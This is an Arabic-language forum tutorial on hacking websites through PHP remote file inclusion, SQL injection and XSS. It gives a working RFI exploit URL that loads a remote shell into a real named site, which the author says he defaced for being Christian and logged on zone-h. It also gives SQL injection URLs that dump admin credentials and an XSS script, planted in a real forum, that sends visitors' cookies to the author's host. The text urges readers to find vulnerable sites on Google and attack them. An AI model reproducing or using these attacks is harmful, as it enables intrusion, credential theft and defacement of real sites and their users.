#############################
الثغـرآت واسغلالهـآ والبحث عنهـآ ..
#############################
################################################## ### ما هي الثغرات ؟؟ الثغره هي عباره عن خطأ برمجي يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه مثلاً فيه سكريبت مبرمج بالـ php عنده أمر لإدراج بيانات أسماء الأعضاء الحين أنا أمسك هالملف واطالع فيه فحصته لقيته عادي ينفذ الأمر اللي هو قراءة بيانات الأعضاء لاحظت فيه خطأ برمجي أقدر من خلاله بدل ما أخلي السكريبت يسوي ادراج لبيانات الأعضاء خليته يسوي إدراج لملف شيل ^_^ وهذي ثغره نسميها File Include ومن الشيل عاد انتم تعرفون خطورته ووش نقدر نسوي فيه .. الخ وهكذا .. أتمنى فهمتم الزبده اتركوا الكلام الفآضي وخذوا الزبده *_^ ################################################## ### ما هي انواع الثغرات ؟؟ الثغراات كثيييييييره لاتعد ولا تحصى في أنواع كثيره من الأنظمه حنا في هالكتاب راح نتطرق لثلاث أنواع أساسية في نظام الـ php وهي 1-File Include(ادراج ملف) 2- Sql Injection (تنفيذ أوامر في قاعدة البيانات) 3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج) =-= النوع الأول هو أخطر أنواع الثغرات ويسري عبر أخطاء برمجية مما يجعل الهكر يقوم بإدراج ملف شيل خطير يمكنه من التلاعب بالموقع واختراقه وأعتقد الكل يعرف وش هو وان شاء الله قريب بنزل كتاب عن الروت يعني من خلال هالشيل تقدر تسطير على السيرفر كآمل بكل مواقعه - النوع الثاني وهذا أقل خطورة من الفايل انكلود ويقوم عبر أخطاء برمجية بإرسال أوامر إلى قاعدة البيانات مثلاً أمر لقراءة معلومات عضوية الأدمن رقم واحد أو أمر لتغيير كلمة مروره وتقدر تستغلها بأشياء كثير كمثال ثغرة sqlمن خلالها نفذنا أمر يقوم بتغيير ايميل عضوية المدير العام للسكريبت المصاب بالثغره فقمنا بتغيير ايميله مثلاً الى ايميلي vv9@hotmail.comثم اروح للسكريبت واسوي نسيت كلمة المرور وراح يرسلها لايميلي لووول وبكذا نخترق عضوية المدير العام وندخل لوحة التحكم للسكريبت وأحلى اندكس اختراق ننزله وبعض السكريبت نقدر نرفع شيل من لوحة التحكم وهكذا .. - النوع الثالث يعتبر أقل خطورة من الأول والثاني وأكيد الكل سمع في هالنوع من الثغرات وحربها وأقرب مثال ثغرات الـ xssفي موقع الهوتميل وهذي الثغرات من خلالها نقدر نسحب كوكيز أي عضو بالموقع مثل الهوتميل لكن تعتبر أقل خطورة في استغلالها لأنها ممكن تدخلنا مثلاً بعضوية المدير العام كمثال في المنتدى بس هنا خطورتها ضعيفه لأننا لو دخلنا ما نعرف الباس ولو نبي نعرف الباس وش نسوي ؟ لازم نغير الايميل لو دخلنا وغيرنا الايميل ما يتغير لاحظت انه يقول لي دخل الباس القديم وانا معرفه لأني داخل عن طريق الكوكيز هنا ما نقدر نستغلها في شي *_^ وكذلك الهوتميل دخلنا وقلنا نبي نغير كلمة المرور بالكوكيز يقول ما تقدر تغيرها لازم تعرف القديمه فكرنا وعرفنا حركه وهي اننا نروح للهوتميل ونقول له نسينا كلمة المرور ويرسل الرابط للانبوكس وراح نفتحه ونغير كلمة المرور وهكذا .. وتختلف خطورة هالنوع من الثغرات من سكريبت إلى آخر ################################################## ### كيفية البحث عن الثغرات ؟؟ موضوع حلو صح ^_^ ايه أكيد حلو لأني أول واحد أحتاجه قبلكم والحمد لله ارتحت منه باقي انتم ترتاحون رآح نشرح كيف نبحث عن الثغرات في المواقع التالية :- www.securityfocus.com www.securityreason.com www.milw0rm.com www.google.com =-= نمسكها وااحد وااحد ويالله بسم الله ادخلوا هنا www.securityfocus.com بعد ما تدخلوا الموقع شوفوا الصوره :-
بعدها تلاحظ طلع لنا جدول بآخر الثغرات مرتبة تحت بعض
وبهالشكل :-
وبكذا والحمد لله عرفنا كيف نطلع آخر الثغرات شرح الاستغلال موب الحين في الدرس التالي
لكن خلونا نكمل هالدرس
لو مثلاً نبي نبحث عن ثغرات سكريبت معين بالموقع
شووف في نفس الموقع هذا
طآلع فوق تلقى مربع اكتب فيه اسم السكريبت
تمام الحين لاحظوا طلع لنا كل ثغرات سكريبت الـ Vb شوفوا الصورة :-
الحمد لله كذا انتهينا من طريقة البحث عن الثغرات الحين بمجرد الضغط عليها راح يطلع لك استغلالها وكل شي واكمال شرحها بالدرس التالي بإذن الله =-= طيب لو ما لقينا اللي نبيه في الموقع اللي دخلناه فوق نجرب في هالموقع www.securityreason.com اذا تبي تشووف آخر الثغرات المكتشفة شووف الصورة :-
ثم راح تطلع لنا آخر الثغرات ومجرد الضغط على اسمها سيتم عرض كل معلوماتها مع استغلالها
طيب لو نبي نبحث عن ثغرات سكريبت معين الطريقة كالتالي :-
ثم
ثم نضغط ور Ok وسيتم البحث وإحضار كل المعلومات بإذن الله =-= طيب لو جربنا الموقعين اللي فوق وما عجبنا ولا واحد فيهم ولا لقينا اللي نبيه نجرب هالموقع www.milw0rm.com
هذا آخر الثغرات تطلع في الصفحة الرئيسية للموقع
واذا تبي تبحث عن ثغرات سكريبت معين شوف الصورة :-
ثم راح تطلع لك النتائج بالشكل التالي :-
وبكذا والحمد لله شرحنا على موقع ميل ورم =-= ولو بعد هذا ما لقينا اللي نبيه في المواقع اللي فوق نسخدم حبيبنا القوقل لووووول ^_^ www.google.com ادخل واكتب اسم السكريبت وشووف أخباره وثغراته وكل شي عنه
وبإذن الله بيطلع لك كل شي عن السكريبت
واقراا وخذ لك كوووفي ومخمخ على رااحتك وأقل من راحتك لأن أهم شي في الهكر
وبالأخص مكتشفي الثغرات يكونون على راحة تاامة وصبورين وان شاء الله يوصلون لهدفهم
=-=
وذي هذا الدرس نكون عرفنا بإذن الله كيف ندور على آخر الثغرات وثغرات سكريبتات معينه
الدرس التالي راح يكون لكيفية استغلال هذه الثغرات بإذن الله
################################################## ###
كيفية استغلال الثغرات ؟؟
هذا موضوع مهم ودقيق شوي
راح نشرح استغلال 3 أنواع قووية ومهمة من الثغرات شرحناها في درس سابق وهي :-
وهي
1-File Include(ادراج ملف)
2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
أعتقد اني شرحتها في درس أنواع الثغرات وفصلتها بالتفصيل الممل والحمد لله
=-=
وراح نشرح كل ثغره مع طريقة استغلالها بإذن الله
ونبدأ أول شي
شوفوا هالثغره لقيتها بمواقع السكيورتي :-
شوف طآل عمرك الثغره هذي وترجمتها اسم السكريبت المصاب + اصدار السكريبت المصاب : WebMatic 2.6 نوع الثغره : File Include هذا أهم شي في السطر كله وبس اضغط عليها لرؤيتها وهذا رابط الثغره شوفها :- http://securityreason.com/exploit*****/1911 شوف طآل عمرك راح أفصل الصفحه لك ان شاء الله شووف
ثم انزل تحت شووي وبتشووف التالي :-
يقول لك طآل عمرك ان فيه خطئين في السكريبت
يعني في السكريبت ثغرتين و Error معناها خطأ
شوف وش يقول لك
Error1 : require($P_INDEX."lib_album.php");
هذا الخطأ البرمجي الأول في السكريبت وسبب لنا ثغرة الفايل انكلود الأولى
وهذا الخطأ الثاني
Error2 : require($P_INDEX."page_album.inc");
وهذي ثغرة ثانية بعد في السكريبت عبارة عن خطأ برمجي أدى الى تكوين ثغرة فايل انكلود ثانية
يعني السكريبت الحين فيه ثغرتين فايل انكلود يا بلاش *_^
وشووف هالأسطر :-
[[RFI]]
http://[target]/
[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/
[path]/core/index/index_album.php?P_INDEX=[Shell] هذي استغلال الثغرتين طآل عمرك [target] = هنا نكتب رابط الموقع اللي عليه السكريبت [path] = هنا نكتب اسم المجلد اللي عليه السكريبت مثل المنتدى ( vb ) اللي باللون الزيتي هذا امتداد الثغره وطريقة استغلالها [Shell] = هنا اكتب رابط شيل انت رافعه على أي موقع ثاني بامتداد (txt) وهذا الاستغلال كامل الحين روح دور أي موقع بقوقل مركب اصدار WebMatic 2.6 وطبق عليه هالثغره وادعسه وهذا مثال على موقع مصاب :- http://www.castillosprayers.com/web/core/index/index_album.php?P_INDEX=http://lecopra.xoompages.com/safe.txt? اللي باللون الأحمر هذا رابط شيل ch99 انا رافعه على موقع ثاني ولاتنسى علامة الاستفهام لازم تكتبها ضروري في آخر الشيل بعد كلمة txt الحين وش راح يصير بعد ما شغلنا هالاستغلال ثغرة الـ File Include تعني ادراج ملف اللي راح يصير الحين ان السكريبت راح يسوي ادراج لملف الشيل من الرابط اللي حطيناه في الاستغلال لداخل الموقع اللي عليه السكريبت وبكذا حنا معنا شيل على الموقع عاد الحين انت سو العجب والعجااب انا رفعت اندكس عالموقع لأن صلاحيتي كانت user وهذا التسجيل بالزون اتش http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=53992 61 وبكذا الحمد لله انتهينا من شرح استغلال ثغرة الـ File Include ملاحظه كان الاستغلال على موقع نصراني اللي فوق *_^ =-= ننتقل الحين لشرح ثغرة Sql Injection راح أشرح على ثغرة sql انجكشن في سكريبت سجل الزوار وفيه أكثر من ثغره راح نشرحها بجميع أنواعها قبل ما أبدأ لازم يكون عندك نسخة من السكريبت اللي تبي تسوي عليه الثغره أو عندك الكود أو الخطأ البرمجي اللي فيه الثغره شوفوا هالثغره :- http://xxx/gb/show.php?do=show&table=hhh الخطأ البرمجي :- $result=mysql_query("SELECT * FROM ".$table." order by id DESC") or die(mysql_error());
تلاحظون المتغير $table هذا داخل الاستعلام وطبعاً تعرفون انتم ان أي كود برمجي يحتوي $table ومدعم بهالسطر :- $table=$_GET['table']; يعني الزائر يقدر يستبدل قيمة table بأي كلمة أو أي شي وهذي ثغره في هالمكان شوفوا الاستغلال :- http://xxx/gb/show.php?do=show&table=hhh يعني حنا الحين نقدر نختار قيمة لـ table وانا كتبت hhh راح يطلع لنا خطأ يقول لنا الجدول hhh غير موجود في قاعدة البيانات يعني الثغره شغاله 100% كل اللي علينا نستدعي جدول admin كذا :- http://localhost/gb/show.php?do=show&table=admin وسوي تشغيل تلاحظ انه أظهر لنا اسم المستخدم وكلمة مرور المدير العام من قاعدة البيانات أو بالأصح أظهر لنا محتوى قالب الـ admin ونقدر نستغله بأي استغلال على راحتك أي قالب تبيه استعديه مثلا http://localhost/gb/show.php?do=show&table=mail اذا أنا ابي ايميلات الأعضاء وهكذا .. هذي بداية بسيطه في هالنوع من الثغرات يبي لها خبره وواحد مبرمج php لا تتعامل معها بشكل كبير اذا مالك خبره فيها اذا تعلمت الفايل انكلود اللي فوق والـ xss وأتقنتهم وحبيت تتعلم الـ sql حآول تبحث عن كتب وتقرا كثير عنها والله الموفق ان شاء الله =-= طيب الحين عرفنا الفايل انكلود وعرفنا مقدمه بسطه عن ثغرات sql انجكشن الحين نشرح ثغرات xss ونااخذ لنا ثغرة xss بالاهداءات في المنتديات والتطبيق على :- http://www.3rbgirl.com/vb/index.php ادخل وسجل بالمنتدى طآل عمرك أنا سجلت والحمد لله =-= على فكرة الثغره لازم نطبقها بشريط الاهداءات ابي اكتب اهداءات عشان انزل الثغره يقول لازم 10 مشاركات برب بشارك وأرجع .. =-= المهم شاركت 10 مشاركات لووووووول >> كنه جاب شي جديد خلاص لا تهآيطيون ترى المشاركات انجااز بس انتم ما عندكم ذووق أساسا *_^ المهم خلونا في موضوعنا شاركنا عشر مشاركات يا سلام الحين نرووح نسوي اضافة اهدااء
ثم اكتب دولتك اكتب السعودية أي خرآآط اكتب الشبكه العنكبوتيه
محتوى الاهداء اكتب :
قبل ما نسوي محتوى الاهداء وقف هنا طآل عمرك اترك كل الشاشات مفتوحة
شوف مجلد الشرح هذا تلقى مجلد مرفق معه اسمه log
ادخل المجلد راح تلقى هالملفين
هالملفين راح تستخدمهم في كل ثغرات الـ xss واللي جرب ثغرة الهوتميل يفهم وش أقصد المهم طآل عمرك لازم يكون عندك موقع أو مساحه مجانية على أي استضافة مجانية أو حتى مدفووعة وانا على سبيل المثال عندي www.hack15.com لازم ترفع الملفات على موقعك وأنا أفضل استخدام برنامج الـ FTP الشرح هنا طآل عمرك ارفع مجلد log على مساحتك وانا على مساحتي على راح يكون تطبيقي كذا www.hack15.com/log/ حلو تمام الحين شووف الملفين cooc2.php >> هالملف ارفعه داخل مجلد log في موقعك بدون أي تعديل اما ملف cooc1.js حرره ببرنامج المفكره
[IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/ss/7.gif[/IMG]
شبآب ما تحسون إني داج بالشرح ههههههههه ^_^
خلونا نكمل المهم بعد ما سوينا موافق راح يحرر الملف لنا بالمفكره
اذا كان جهازك عربي اضغط على الكيبورد Ctrl+Shift اللي في أيسر الكيبورد عشان نقلب المفكرة
على الجهة اليسرى عشان نكتب بدون أخطاء وأسهل ^_^
شووف الصورة :-
ثم سوي حفظ
ثم ارفع ملف coc1.js
الى ملف log بالموقع
تمام الحين أعطي ملف log التصريح 777
حلو تمام الحين انتهينا من هالخطوه والحمد لله
=-=
الحين نقدر نسوي أي ثغرة xss بسهوله
نستخدم استغلال الثغره ونستبدل رابط سرقة الكوكيز برابطنا
مثلاً
هذي ثغرة الكوكيز
تكتب في محتوى اهداءك هالكود :-
<Script>location.href="http://www.hack15.com/log/cooc2.php"+********.coockie</Script>
استبدل اللي باللون الأصفر برابط موقعك او مساحتك واعتمد الكود في الاهداءات وروح ناام لووول الحين أي واحد يشوف الاهداءات من الأعضاء أو بالأصح يطب المنتدى ^_^ راح ينسرق كوكيزه بتقول لي يا حسين وين بيروح الكوكيز ؟ بقول لك طآل عمرك ادخل مجلد log في موقعك تلقى ملف xss.htm داخله تلقى كل الكوكيزات القط كوكيز المدير العام وأحلى اختراق وفيه ثغرات تكون في عنوان الموقع مثل الهوتميل استغلالها يختلف بشوي لكن أهم شي الملفات تكون عندك يعني مجرد تعرف الثغره بس تضيف رابط اللوق تبعك واخترق لووووول كيف تستغل الكوكيز طبعاً يختلف من ثغره لأخرى الهوتميل معروفه ومشروحه ببيت الهكرز بالنسبة لكوكيزات المنتديات استغلالها هنا :- http://www.v99x.com/vb/showthread.php?t=783 الشرح لحبيبي صقر غاامد وأحب أقول له ألف ألف مبرووك عالزواج يا قلبي الله يوفقك *_^ والحمد لله كذا استغلينا ثلاث أنواع الثغرات أخطر ثغرات الـ php والحين أقدر أقول لك انت هكر ================